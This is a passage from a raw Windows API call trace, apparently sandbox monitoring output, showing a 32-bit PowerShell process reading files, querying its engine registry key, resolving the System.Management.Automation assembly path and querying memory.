hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.047] GetLastError () returned 0x0 [0152.047] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.047] GetLastError () returned 0x0 [0152.047] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.047] GetLastError () returned 0x0 [0152.047] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.047] GetLastError () returned 0x0 [0152.079] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.080] GetLastError () returned 0x0 [0152.080] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.080] GetLastError () returned 0x0 [0152.080] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.080] GetLastError () returned 0x0 [0152.080] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.080] GetLastError () returned 0x0 [0152.080] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.080] GetLastError () returned 0x0 [0152.080] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.081] GetLastError () returned 0x0 [0152.081] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.081] GetLastError () returned 0x0 [0152.081] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.081] GetLastError () returned 0x0 [0152.081] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.081] GetLastError () returned 0x0 [0152.081] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.081] GetLastError () returned 0x0 [0152.081] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.082] GetLastError () returned 0x0 [0152.082] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.082] GetLastError () returned 0x0 [0152.082] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.082] GetLastError () returned 0x0 [0152.082] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.082] GetLastError () returned 0x0 [0152.082] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.082] GetLastError () returned 0x0 [0152.082] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.082] GetLastError () returned 0x0 [0152.083] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.083] GetLastError () returned 0x0 [0152.083] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.083] GetLastError () returned 0x0 [0152.083] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0xf37, lpOverlapped=0x0) returned 1 [0152.083] GetLastError () returned 0x0 [0152.083] ReadFile (in: hFile=0x34c, lpBuffer=0x2d822eb, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d822eb*, lpNumberOfBytesRead=0x23e544*=0x0, lpOverlapped=0x0) returned 1 [0152.083] GetLastError () returned 0x0 [0152.083] ReadFile (in: hFile=0x34c, lpBuffer=0x2d82c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82c14*, lpNumberOfBytesRead=0x23e544*=0x0, lpOverlapped=0x0) returned 1 [0152.083] GetLastError () returned 0x0 [0152.084] CloseHandle (hObject=0x34c) returned 1 [0152.084] GetLastError () returned 0x0 [0152.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e0a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0152.084] GetLastError () returned 0x0 [0152.084] SetErrorMode (uMode=0x1) returned 0x1 [0152.084] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2da3c10 | out: lpFileInformation=0x2da3c10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0152.084] GetLastError () returned 0x0 [0152.084] SetErrorMode (uMode=0x1) returned 0x1 [0152.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0152.084] GetLastError () returned 0x0 [0152.084] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e4c8 | out: phkResult=0x23e4c8*=0x34c) returned 0x0 [0152.084] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x23e510, lpData=0x0, lpcbData=0x23e50c*=0x0 | out: lpType=0x23e510*=0x1, lpData=0x0, lpcbData=0x23e50c*=0x56) returned 0x0 [0152.085] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x23e510, lpData=0x357e88, lpcbData=0x23e50c*=0x56 | out: lpType=0x23e510*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x23e50c*=0x56) returned 0x0 [0152.085] RegCloseKey (hKey=0x34c) returned 0x0 [0152.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0152.085] GetLastError () returned 0x0 [0152.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e004, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0152.085] GetLastError () returned 0x0 [0152.093] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x355608eb, Data2=0xc0b7, Data3=0x41e2, Data4=([0]=0xab, [1]=0xbd, [2]=0x93, [3]=0x24, [4]=0xa0, [5]=0xfd, [6]=0xae, [7]=0x4b))) returned 0x0 [0152.093] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xf26236ed, Data2=0x2610, Data3=0x41cb, Data4=([0]=0x8e, [1]=0xf5, [2]=0xd5, [3]=0xc8, [4]=0xff, [5]=0x86, [6]=0x28, [7]=0x99))) returned 0x0 [0152.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.094] GetLastError () returned 0x0 [0152.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.094] GetLastError () returned 0x0 [0152.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.094] GetLastError () returned 0x0 [0152.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.094] GetLastError () returned 0x0 [0152.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.217] GetLastError () returned 0x0 [0152.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.217] GetLastError () returned 0x0 [0152.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.217] GetLastError () returned 0x0 [0152.217] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x63a1297b, Data2=0x7f65, Data3=0x46fb, Data4=([0]=0xa2, [1]=0xcf, [2]=0xab, [3]=0x96, [4]=0xad, [5]=0xa3, [6]=0xf6, [7]=0x35))) returned 0x0 [0152.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dc48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.217] GetLastError () returned 0x0 [0152.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.217] GetLastError () returned 0x0 [0152.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.217] GetLastError () returned 0x0 [0152.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dc48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.217] GetLastError () returned 0x0 [0152.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.217] GetLastError () returned 0x0 [0152.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.218] GetLastError () returned 0x0 [0152.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.218] GetLastError () returned 0x0 [0152.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.218] GetLastError () returned 0x0 [0152.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.218] GetLastError () returned 0x0 [0152.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.218] GetLastError () returned 0x0 [0152.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.218] GetLastError () returned 0x0 [0152.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.218] GetLastError () returned 0x0 [0152.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.219] GetLastError () returned 0x0 [0152.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.219] GetLastError () returned 0x0 [0152.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.219] GetLastError () returned 0x0 [0152.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.219] GetLastError () returned 0x0 [0152.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.219] GetLastError () returned 0x0 [0152.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.219] GetLastError () returned 0x0 [0152.220] VirtualQuery (in: lpAddress=0x23ce84, lpBuffer=0x23de84, dwLength=0x1c | out: lpBuffer=0x23de84*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.220] VirtualQuery (in: lpAddress=0x23cec0, lpBuffer=0x23dec0, dwLength=0x1c | out: lpBuffer=0x23dec0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.221] GetLastError () returned 0x0 [0152.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.221] GetLastError () returned 0x0 [0152.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.221] GetLastError () returned 0x0 [0152.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.221] GetLastError () returned 0x0 [0152.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.221] GetLastError () returned 0x0 [0152.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.221] GetLastError () returned 0x0 [0152.221] VirtualQuery (in: lpAddress=0x23d1f0, lpBuffer=0x23e1f0, dwLength=0x1c | out: lpBuffer=0x23e1f0*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.221] GetLastError () returned 0x0 [0152.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.221] GetLastError () returned 0x0 [0152.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.221] GetLastError () returned 0x0 [0152.222] VirtualQuery (in: lpAddress=0x23d1f0, lpBuffer=0x23e1f0, 